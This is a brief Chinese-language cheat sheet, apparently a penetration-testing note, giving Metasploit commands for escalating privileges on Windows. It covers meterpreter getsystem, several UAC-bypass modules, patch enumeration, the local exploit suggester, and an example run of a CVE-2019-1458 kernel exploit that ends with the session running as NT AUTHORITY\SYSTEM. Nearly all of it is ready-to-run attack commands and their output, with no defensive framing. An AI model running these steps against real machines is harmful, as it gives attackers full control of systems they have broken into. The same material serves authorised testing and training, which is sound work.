提权------MSF提权
getsystem
meterpreter> getsystem
BypassUAC
use exploit/windows/local/bypassuac use exploit/windows/local/bypassuac_injection use windows/local/bypassuac_vbs use windows/local/ask
meterpreter> background # 后台session msf> use exploit/windows/local/bypassuac msf> set SESSION <session_id> # 后台session时会返回session_id,如不清楚可以使用命令sessions -l msf> run
内核提权
# 查询补丁 meterpreter> run post/windows/gather/enum_patches [+] KB2999226 installed on 11/25/2020 [+] KB976902 installed on 11/21/2010 # 查询Exp msf> use post/multi/recon/local_exploit_suggester msf> set LHOST <攻击机IP> msf> set SESSION <session_id> msf> run # 利用示例 msf> use exploit/windows/local/cve_2019_1458_wizardopium msf> set SESSION <session_id> msf> run meterpreter> getuid Server username: NT AUTHORITY\SYSTEM